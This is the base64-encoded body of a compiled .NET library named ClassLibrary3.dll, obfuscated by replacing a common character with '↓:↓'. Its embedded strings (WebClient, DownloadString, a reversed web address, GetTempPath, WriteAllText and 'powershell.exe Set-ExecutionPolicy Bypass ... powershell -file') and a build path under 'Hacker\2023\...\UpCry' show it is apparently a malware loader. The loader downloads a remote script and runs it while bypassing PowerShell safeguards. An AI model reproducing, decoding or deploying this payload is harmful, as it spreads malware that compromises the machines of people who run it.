↓:↓↓:↓↓:↓BYIoQik↓:↓QI↓:↓ICE↓:↓↓:↓↓:↓↓:↓↓:↓EwgyCKQB↓:↓g↓:↓nIQ↓:↓↓:↓↓:↓↓:↓↓:↓GGOEGBg↓:↓C↓:↓D↓:↓h↓:↓↓:↓↓:↓↓:↓↓:↓BY↓:↓XgCp↓:↓QI↓:↓CCM↓:↓↓:↓↓:↓↓:↓↓:↓EQDP↓:↓KM↓:↓BQ↓:↓QIw↓:↓↓:↓↓:↓↓:↓DG↓:↓lMI+g↓:↓G↓:↓B4j↓:↓↓:↓↓:↓↓:↓↓:↓MYCFQH/↓:↓↓:↓c↓:↓JiM↓:↓↓:↓↓:↓↓:↓↓:↓gwCL↓:↓b↓:↓BBw↓:↓yIw↓:↓↓:↓↓:↓↓:↓DG↓:↓o8Ekw↓:↓H↓:↓Dwj↓:↓↓:↓↓:↓↓:↓↓:↓BE↓:↓h↓:↓C1↓:↓Qc↓:↓XCM↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓QBw↓:↓L0BC↓:↓BlIw↓:↓↓:↓↓:↓↓:↓↓:↓GGOEGBg↓:↓J↓:↓H↓:↓j↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓MI7↓:↓BK↓:↓↓:↓k↓:↓pCM↓:↓↓:↓↓:↓↓:↓↓:↓BhjhBgY↓:↓CQ↓:↓↓:↓↓:↓↓:↓E↓:↓TgQ↓:↓↓:↓↓:↓E↓:↓8↓:↓g↓:↓↓:↓↓:↓I↓:↓W↓:↓↓:↓↓:↓↓:↓↓:↓M↓:↓Ug↓:↓↓:↓↓:↓↓:↓E↓:↓9gg↓:↓↓:↓↓:↓E↓:↓3↓:↓U↓:↓↓:↓↓:↓E↓:↓D↓:↓E↓:↓↓:↓↓:↓E↓:↓D↓:↓EJ↓:↓OEG↓:↓Q↓:↓R↓:↓OEGBg↓:↓Z↓:↓OEGCg↓:↓p↓:↓OEGE↓:↓↓:↓x↓:↓OEGE↓:↓↓:↓5↓:↓OEGE↓:↓BB↓:↓OEGE↓:↓BJ↓:↓OEGE↓:↓BR↓:↓OEGE↓:↓BZ↓:↓OEGFQBh↓:↓OEGE↓:↓Bp↓:↓OEGE↓:↓Bx↓:↓OEGE↓:↓B5↓:↓OEGGgCJ↓:↓OEGI↓:↓Ch↓:↓OEGBgCp↓:↓OEGBgCx↓:↓OEGBgDJ↓:↓OEGJgDh↓:↓OEGE↓:↓Dp↓:↓OEGBgDx↓:↓OEGBgCR↓:↓OEGBgCZ↓:↓OEGBg↓:↓M↓:↓OEGBg↓:↓U↓:↓OEGBg↓:↓c↓:↓OEGBg↓:↓k↓:↓OEGBg↓:↓M↓:↓Ow↓:↓Sg↓:↓U↓:↓Ow↓:↓Sg↓:↓c↓:↓Ow↓:↓Sg↓:↓k↓:↓Ow↓:↓SgC5↓:↓EoITwDR↓:↓D8BVQDR↓:↓↓:↓0JXQD5↓:↓OEGYw↓:↓p↓:↓cI↓:↓aw↓:↓J↓:↓eEGBgC5↓:↓OEGBg↓:↓x↓:↓ZgEh↓:↓↓:↓5↓:↓X4Ii↓:↓BB↓:↓TsFjg↓:↓5↓:↓a0Gkw↓:↓5↓:↓VoIlwBJ↓:↓aQEn↓:↓↓:↓x↓:↓WIBow↓:↓x↓:↓W4Bi↓:↓BZ↓:↓VQEq↓:↓Bh↓:↓ccGrgBh↓:↓bUGtQBp↓:↓Q4FuQ↓:↓5↓:↓RoJw↓:↓B5↓:↓eEGBgCB↓:↓U↓:↓↓:↓wwB5↓:↓VkEyQB5↓:↓Y↓:↓E0↓:↓↓:↓5↓:↓SoFkw↓:↓5↓:↓dU↓:↓1QCJ↓:↓eMBBgCR↓:↓eEGE↓:↓B5↓:↓Y↓:↓E2wCB↓:↓SEBwwBZ↓:↓dkI4gCZ↓:↓QgF6wCp↓:↓esBowCx↓:↓UUE9QC5↓:↓FMI+gC5↓:↓BUB/wC5↓:↓I8EkwC5↓:↓d0↓:↓CwE0↓:↓OYIIgE8↓:↓DEESg↓:↓8↓:↓DsEOQE8↓:↓OEGBg↓:↓p↓:↓KM↓:↓5↓:↓Mu↓:↓↓:↓s↓:↓7gEu↓:↓BM↓:↓9wEu↓:↓Bs↓:↓FgIu↓:↓CM↓:↓HwIu↓:↓Cs↓:↓HwIu↓:↓DM↓:↓HwIu↓:↓Ds↓:↓HwIu↓:↓EM↓:↓JQIu↓:↓Es↓:↓HwIu↓:↓FM↓:↓HwIu↓:↓Fs↓:↓PQIu↓:↓GM↓:↓ZwIu↓:↓Gs↓:↓d↓:↓J↓:↓↓:↓IM↓:↓vgJ↓:↓↓:↓Hs↓:↓wwJD↓:↓HM↓:↓z↓:↓JD↓:↓Hs↓:↓wwJJ↓:↓KM↓:↓9QNj↓:↓HM↓:↓z↓:↓Jj↓:↓Hs↓:↓wwJp↓:↓KM↓:↓CQS↓:↓↓:↓IM↓:↓vgKD↓:↓Is↓:↓vgKD↓:↓JM↓:↓vgKD↓:↓HM↓:↓z↓:↓KJ↓:↓KM↓:↓FgSg↓:↓IM↓:↓vgKj↓:↓Is↓:↓vgKj↓:↓HM↓:↓5QKj↓:↓Ks↓:↓vgKj↓:↓LM↓:↓vgKj↓:↓JM↓:↓vgKp↓:↓Hs↓:↓FgL↓:↓↓:↓IM↓:↓vgLD↓:↓LM↓:↓vgLD↓:↓HM↓:↓JwPD↓:↓Hs↓:↓FgLJ↓:↓Hs↓:↓FgLg↓:↓IM↓:↓vgLj↓:↓Is↓:↓vgLj↓:↓JM↓:↓vgLj↓:↓Ks↓:↓vgLj↓:↓LM↓:↓vgIJ↓:↓aM↓:↓KgQj↓:↓Xs↓:↓wwIj↓:↓Zs↓:↓ggND↓:↓Xs↓:↓wwJD↓:↓VM↓:↓HwJ↓:↓↓:↓ns↓:↓wwJ↓:↓↓:↓oM↓:↓vgJg↓:↓ns↓:↓wwJg↓:↓oM↓:↓vgK↓:↓↓:↓ns↓:↓wwK↓:↓↓:↓oM↓:↓vgKg↓:↓ns↓:↓wwKg↓:↓oM↓:↓vgL↓:↓↓:↓oM↓:↓vgLg↓:↓oM↓:↓vgI↓:↓↓:↓4M↓:↓vgI↓:↓↓:↓3s↓:↓wwIg↓:↓4M↓:↓vgJ↓:↓↓:↓4M↓:↓vgJ↓:↓↓:↓3s↓:↓wwJ0↓:↓↓:↓MBFgEE↓:↓↓:↓E↓:↓BQ↓:↓F↓:↓↓:↓Y↓:↓Bw↓:↓H↓:↓↓:↓g↓:↓Cg↓:↓J↓:↓↓:↓↓:↓↓:↓p↓:↓bF↓:↓Q↓:↓↓:↓d↓:↓XK↓:↓Q↓:↓↓:↓k↓:↓bP↓:↓Q↓:↓↓:↓MQfU↓:↓Q↓:↓↓:↓U↓:↓bZ↓:↓Q↓:↓↓:↓swHe↓:↓Q↓:↓↓:↓pQjk↓:↓Q↓:↓↓:↓QQjk↓:↓Q↓:↓↓:↓8↓:↓Dp↓:↓QI↓:↓B↓:↓↓:↓D↓:↓↓:↓I↓:↓BQ↓:↓F↓:↓↓:↓I↓:↓Bg↓:↓H↓:↓↓:↓I↓:↓Bw↓:↓J↓:↓↓:↓I↓:↓C↓:↓↓:↓L↓:↓↓:↓I↓:↓CQ↓:↓N↓:↓↓:↓E↓:↓Cg↓:↓N↓:↓↓:↓I↓:↓DQ↓:↓P↓:↓↓:↓I↓:↓Dg↓:↓R↓:↓↓:↓I↓:↓GQ↓:↓T↓:↓C4↓:↓NQ↓:↓8↓:↓EM↓:↓C↓:↓Eb↓:↓SoBMQEEg↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓y↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓PwGj↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓/↓:↓SMF↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓o↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓EgBr↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓D5Bw↓:↓↓:↓CQ↓:↓E↓:↓↓:↓o↓:↓B↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓F↓:↓Bu↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓t↓:↓G4↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓C8↓:↓bgCN↓:↓BEBjQ↓:↓0↓:↓Q↓:↓↓:↓↓:↓ENvbnRleHRWYWx1ZW↓:↓x↓:↓FRocmVhZFNhZmVPYmplY3RQcm92aWRlcm↓:↓x↓:↓ENsYXNzMQBDbGFzc0xpYnJhcnkz↓:↓GdldF9VVEY4↓:↓DxNb2R1bGU+↓:↓FNab0JD↓:↓EZhVWRH↓:↓HByRlZJ↓:↓FN5c3RlbS5JTwBU↓:↓ERpc3Bvc2VfX0luc3RhbmNlX18↓:↓Q3JlYXRlX19JbnN0YW5jZV9f↓:↓FByb2plY3REYXRh↓:↓G1zY29ybGli↓:↓E1pY3Jvc29mdC5WaXN1YWxCYXNpYwBTeW5jaHJvbml6ZWQ↓:↓QVhTd2Q↓:↓UmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBnZXRfR2V0SW5zdGFuY2U↓:↓ZGVmYXVsdEluc3RhbmNl↓:↓Gluc3RhbmNl↓:↓EdldEhhc2hDb2Rl↓:↓GdldF9Vbmljb2Rl↓:↓FJ1bnRpbWVUeXBlSGFuZGxl↓:↓EdldFR5cGVGcm9tSGFuZGxl↓:↓EZpbGU↓:↓QXBwV2luU3R5bGU↓:↓R2V0RmlsZU5hbWU↓:↓Q29tYmluZQBTZWN1cml0eVByb3RvY29sVHlwZQBHZXRUeXBl↓:↓GdldF9DdWx0dXJl↓:↓HNldF9DdWx0dXJl↓:↓HJlc291cmNlQ3VsdHVyZQBBcHBsaWNhdGlvbkJhc2U↓:↓QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U↓:↓RGlzcG9zZQBTdHJSZXZlcnNl↓:↓EVkaXRvckJyb3dzYWJsZVN0YXRl↓:↓ENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRl↓:↓Ed1aWRBdHRyaWJ1dGU↓:↓SGVscEtleXdvcmRBdHRyaWJ1dGU↓:↓R2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRl↓:↓ERlYnVnZ2FibGVBdHRyaWJ1dGU↓:↓RWRpdG9yQnJvd3NhYmxlQXR0cmlidXRl↓:↓ENvbVZpc2libGVBdHRyaWJ1dGU↓:↓QXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGU↓:↓RGVidWdnZXJIaWRkZW5BdHRyaWJ1dGU↓:↓QXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRl↓:↓ENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGU↓:↓QXNzZW1ibHlQcm9kdWN0QXR0cmlidXRl↓:↓EFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRl↓:↓EFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBnZXRfVmFsdWU↓:↓c2V0X1ZhbHVl↓:↓EdldE9iamVjdFZhbHVl↓:↓E1vdmU↓:↓c2V0X0VuY29kaW5n↓:↓FN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmc↓:↓RG93bmxvYWRTdHJpbmc↓:↓VG9TdHJpbmc↓:↓R2V0VGVtcFBhdGg↓:↓R2V0Rm9sZGVyUGF0a↓:↓BVcmk↓:↓TWljcm9zb2Z0LlZpc3VhbEJhc2ljLk15U2VydmljZXMuSW50ZXJuYWw↓:↓U3lzdGVtLkNvbXBvbmVudE1vZGVs↓:↓ENsYXNzTGlicmFyeTMuZGxs↓:↓FNoZWxs↓:↓HNldF9TZWN1cml0eVByb3RvY29s↓:↓FN5c3RlbQBUcmlt↓:↓HJlc291cmNlTWFu↓:↓FRvQm9vbGVhbgBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWdu↓:↓GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u↓:↓FN5c3RlbS5Db25maWd1cmF0aW9u↓:↓FN5c3RlbS5HbG9iYWxpemF0aW9u↓:↓EludGVyYWN0aW9u↓:↓FN5c3RlbS5SZWZsZWN0aW9u↓:↓EV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBtX0FwcE9iamVjdFByb3ZpZGVy↓:↓G1fVXNlck9iamVjdFByb3ZpZGVy↓:↓G1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBTcGVjaWFsRm9sZGVy↓:↓GdldF9SZXNvdXJjZU1hbmFnZXI↓:↓U2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI↓:↓TXlDb21wdXRlcgBUb0xvd2Vy↓:↓ENsZWFyUHJvamVjdEVycm9y↓:↓FNldFByb2plY3RFcnJvcgBBY3RpdmF0b3I↓:↓LmN0b3I↓:↓LmNjdG9y↓:↓FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM↓:↓TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM↓:↓TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM↓:↓U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz↓:↓ENsYXNzTGlicmFyeTMuTXkuUmVzb3VyY2Vz↓:↓ENsYXNzTGlicmFyeTMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBTdHJpbmdz↓:↓GdldF9TZXR0aW5ncwBNeVNldHRpbmdz↓:↓FJlZmVyZW5jZUVxdWFscwBDb250YWlucwBDb252ZXJzaW9ucwBSdW50aW1lSGVscGVycwBDb25jYXQ↓:↓T2JqZWN0↓:↓E15UHJvamVjd↓:↓BTeXN0ZW0uTmV0↓:↓GdldF9EZWZhdWx0↓:↓FdlYkNsaWVud↓:↓BFbnZpcm9ubWVud↓:↓BDb21wb25lbnQ↓:↓U3lzdGVtLlRleHQ↓:↓V3JpdGVBbGxUZXh0↓:↓G1fQ29udGV4d↓:↓Bua0dNdgBBdmJFdwBDbGFzc0xpYnJhcnkzLk15↓:↓GdldF9Bc3NlbWJseQBFbXB0eQBNeVNldHRpbmdzUHJvcGVydHk↓:↓↓:↓↓:↓↓:↓vQwBs↓:↓GE↓:↓cwBz↓:↓Ew↓:↓aQBi↓:↓HI↓:↓YQBy↓:↓Hk↓:↓Mw↓:↓u↓:↓FI↓:↓ZQBz↓:↓G8↓:↓dQBy↓:↓GM↓:↓ZQBz↓:↓↓:↓↓:↓Le↓:↓↓:↓u↓:↓H↓:↓↓:↓cw↓:↓x↓:↓↓:↓BzcgBj↓:↓DE↓:↓Mg↓:↓1↓:↓GQ↓:↓LwB1↓:↓HI↓:↓LgB6↓:↓HY↓:↓MwBi↓:↓HQ↓:↓b↓:↓Bu↓:↓GI↓:↓dg↓:↓1↓:↓Hc↓:↓eQBn↓:↓D↓:↓↓:↓MgBi↓:↓Hk↓:↓egBn↓:↓Gk↓:↓d↓:↓Bm↓:↓Gc↓:↓aQBw↓:↓GI↓:↓cwBk↓:↓HY↓:↓b↓:↓Bo↓:↓Gk↓:↓cgBu↓:↓Hc↓:↓eQBv↓:↓GI↓:↓cwBh↓:↓C8↓:↓Lw↓:↓6↓:↓H↓:↓↓:↓d↓:↓B0↓:↓Gg↓:↓↓:↓↓:↓eTITo↓:↓kyEB↓:↓0E↓:↓↓:↓Htz↓:↓Hc↓:↓cgBl↓:↓DI↓:↓YQ↓:↓v↓:↓GQ↓:↓cwBh↓:↓C8↓:↓dQBy↓:↓C4↓:↓egB2↓:↓DM↓:↓YgB0↓:↓Gw↓:↓bgBi↓:↓HY↓:↓NQB3↓:↓Hk↓:↓Zw↓:↓w↓:↓DI↓:↓YgB5↓:↓Ho↓:↓ZwBp↓:↓HQ↓:↓ZgBn↓:↓Gk↓:↓c↓:↓Bi↓:↓HM↓:↓Z↓:↓B2↓:↓Gw↓:↓a↓:↓Bp↓:↓HI↓:↓bgB3↓:↓Hk↓:↓bwBi↓:↓HM↓:↓YQ↓:↓v↓:↓C8↓:↓OgBw↓:↓HQ↓:↓d↓:↓Bo↓:↓↓:↓↓:↓PJQBu↓:↓Gs↓:↓RwBN↓:↓HY↓:↓JQ↓:↓↓:↓DyU↓:↓cQBs↓:↓Hg↓:↓SwBQ↓:↓CU↓:↓↓:↓ICZc↓:↓Bv↓:↓Hc↓:↓ZQBy↓:↓HM↓:↓a↓:↓Bl↓:↓Gw↓:↓b↓:↓↓:↓u↓:↓GU↓:↓e↓:↓Bl↓:↓C↓:↓↓:↓UwBl↓:↓HQ↓:↓LQBF↓:↓Hg↓:↓ZQBj↓:↓HU↓:↓d↓:↓Bp↓:↓G8↓:↓bgBQ↓:↓G8↓:↓b↓:↓Bp↓:↓GM↓:↓eQ↓:↓g↓:↓EI↓:↓eQBw↓:↓GE↓:↓cwBz↓:↓C↓:↓↓:↓LQBT↓:↓GM↓:↓bwBw↓:↓GU↓:↓I↓:↓BQ↓:↓HI↓:↓bwBj↓:↓GU↓:↓cwBz↓:↓C↓:↓↓:↓Ow↓:↓g↓:↓H↓:↓↓:↓bwB3↓:↓GU↓:↓cgBz↓:↓Gg↓:↓ZQBs↓:↓Gw↓:↓I↓:↓↓:↓t↓:↓GY↓:↓aQBs↓:↓GU↓:↓I↓:↓↓:↓B2541oOaqvUmbdo3jBMKsug↓:↓EI↓:↓EBC↓:↓Mg↓:↓↓:↓EFI↓:↓EBEREEI↓:↓EBDgQg↓:↓QECBS↓:↓C↓:↓Q4OBS↓:↓B↓:↓RFBBy↓:↓E↓:↓Q4ODg4GFRIo↓:↓RIMBhUSK↓:↓ESC↓:↓YVEigBEmEGFRIo↓:↓RIkBC↓:↓↓:↓Ew↓:↓F↓:↓↓:↓ICHBwH↓:↓↓:↓ESaRG↓:↓jQUg↓:↓BK↓:↓kQcg↓:↓gEOEoCRC↓:↓↓:↓BEoCVEoCVDwcJDgIOEoCJDg4ODhK↓:↓iQM↓:↓↓:↓↓:↓4F↓:↓↓:↓IODg4E↓:↓↓:↓ECDgMg↓:↓↓:↓4EI↓:↓ECDgY↓:↓↓:↓Q4RgKkE↓:↓↓:↓EODgU↓:↓↓:↓gEODgY↓:↓↓:↓QESgIkD↓:↓↓:↓↓:↓BBg↓:↓B↓:↓RG↓:↓uQIGDgU↓:↓↓:↓BK↓:↓wQYg↓:↓QESgMEEI↓:↓EODgUg↓:↓g4ODgYg↓:↓Q4SgMkI↓:↓↓:↓MBDg4SgMEJ↓:↓↓:↓QIDhG↓:↓0QIIB↓:↓↓:↓BHBwEI↓:↓ECH↓:↓Mg↓:↓↓:↓gEBwEe↓:↓↓:↓Ie↓:↓↓:↓UQ↓:↓Q↓:↓e↓:↓↓:↓QK↓:↓R4↓:↓B↓:↓cBEw↓:↓GFRIo↓:↓RM↓:↓BwYVEm0BEw↓:↓GFRJt↓:↓RM↓:↓↓:↓hM↓:↓B↓:↓oBEw↓:↓FI↓:↓EBEw↓:↓It3pcVhk04IkIsD9ffxHVCjoHBhUSK↓:↓ESD↓:↓cGFRIo↓:↓RIIBwYVEigBEmEHBhUSK↓:↓ESJ↓:↓MGEn0EBhK↓:↓gQMGEhgE↓:↓↓:↓↓:↓SD↓:↓Q↓:↓↓:↓BIIB↓:↓↓:↓↓:↓EmEE↓:↓↓:↓↓:↓SJ↓:↓Q↓:↓↓:↓BJ9BQ↓:↓↓:↓EoCBBg↓:↓B↓:↓RK↓:↓gQQ↓:↓↓:↓BIYBg↓:↓D↓:↓Q4ODgQg↓:↓BJpBx↓:↓B↓:↓R4↓:↓Hg↓:↓HM↓:↓EB↓:↓R↓:↓e↓:↓↓:↓QI↓:↓BIMB↓:↓g↓:↓EggEC↓:↓↓:↓SYQQI↓:↓BIkB↓:↓g↓:↓En0FC↓:↓↓:↓SgIEEC↓:↓↓:↓SG↓:↓Qo↓:↓BM↓:↓C↓:↓E↓:↓C↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓HgE↓:↓↓:↓QBU↓:↓hZXcmFwTm9uRXhjZXB0aW9uVGhyb3dz↓:↓QgB↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓UB↓:↓↓:↓↓:↓↓:↓↓:↓BcB↓:↓BJDb3B5cmlnaHQgwqkgIDIwMjI↓:↓↓:↓CkB↓:↓CQxQjQxRDRENC1EQkQ0LTQ1NEEtQjZBNC0xOEQ4MUM0MTkzRT↓:↓↓:↓↓:↓↓:↓wB↓:↓↓:↓cxLj↓:↓uMC4w↓:↓↓:↓BJ↓:↓Q↓:↓aLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUB↓:↓FQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEi5ORVQgRnJhbWV3b3JrIDQuNQQB↓:↓↓:↓↓:↓↓:↓C↓:↓E↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓G↓:↓E↓:↓Ck15VGVtcGxhdGUIMTEuMC4wLj↓:↓↓:↓↓:↓EEB↓:↓DNTeXN0ZW0uUmVzb3VyY2VzLlRvb2xzLlN0cm9uZ2x5VHlwZWRSZXNvdXJjZUJ1aWxkZXIIMTYuMC4wLj↓:↓↓:↓↓:↓FoB↓:↓EtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IJMTYuMT↓:↓uMC4w↓:↓↓:↓Bh↓:↓Q↓:↓0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXw↓:↓↓:↓↓:↓B↓:↓B↓:↓↓:↓tNeS5Db21wdXRlcg↓:↓↓:↓EwE↓:↓Dk15LkFwcGxpY2F0aW9u↓:↓↓:↓↓:↓M↓:↓Q↓:↓HTXkuVXNlcg↓:↓↓:↓EwE↓:↓Dk15LldlYlNlcnZpY2Vz↓:↓↓:↓↓:↓Q↓:↓Q↓:↓LTXkuU2V0dGluZ3M↓:↓↓:↓↓:↓C0↓:↓↓:↓↓:↓↓:↓zsrvvgE↓:↓↓:↓↓:↓CR↓:↓↓:↓↓:↓↓:↓bFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLj↓:↓sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT↓:↓4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNld↓:↓I↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓FBBRFBBRFC0↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓INO4r4↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓Io↓:↓↓:↓↓:↓D4P↓:↓↓:↓↓:↓+B4↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓BSU0RTcJDtD↓:↓HCe0iMhltKt03JpQE↓:↓↓:↓↓:↓BEOlxFeHRlcm5cVk1zXEhhY2tlclwyMDIzXFNvcnVjZVxTb3VyY2VcVXBDcnlcTWV0b2RvIERGXENsYXNzTGlicmFyeTNcQ2xhc3NMaWJyYXJ5M1xvYmpcUmVsZWFzZVxDbGFzc0xpYnJhcnkzLnBkYgCqPQ↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓DEPQ↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓tj0↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓BfQ29yRGxsTWFpbgBtc2NvcmVlLmRsb↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓D/JQ↓:↓g↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓E↓:↓↓:↓↓:↓↓:↓Bg↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓Q↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓Eg↓:↓↓:↓↓:↓BYQ↓:↓↓:↓↓:↓D↓:↓M↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓D↓:↓M0↓:↓↓:↓↓:↓↓:↓VgBT↓:↓F8↓:↓VgBF↓:↓FI↓:↓UwBJ↓:↓E8↓:↓TgBf↓:↓Ek↓:↓TgBG↓:↓E8↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓L0E7/4↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓D8↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓BE↓:↓↓:↓↓:↓↓:↓↓:↓QBW↓:↓GE↓:↓cgBG↓:↓Gk↓:↓b↓:↓Bl↓:↓Ek↓:↓bgBm↓:↓G8↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓CQ↓:↓B↓:↓↓:↓↓:↓↓:↓FQ↓:↓cgBh↓:↓G4↓:↓cwBs↓:↓GE↓:↓d↓:↓Bp↓:↓G8↓:↓bg↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓CwBGwC↓:↓↓:↓↓:↓B↓:↓FM↓:↓d↓:↓By↓:↓Gk↓:↓bgBn↓:↓EY↓:↓aQBs↓:↓GU↓:↓SQBu↓:↓GY↓:↓bw↓:↓↓:↓↓:↓EgC↓:↓↓:↓↓:↓B↓:↓D↓:↓↓:↓M↓:↓↓:↓w↓:↓D↓:↓↓:↓M↓:↓↓:↓0↓:↓GI↓:↓M↓:↓↓:↓↓:↓↓:↓Bo↓:↓↓:↓Q↓:↓B↓:↓E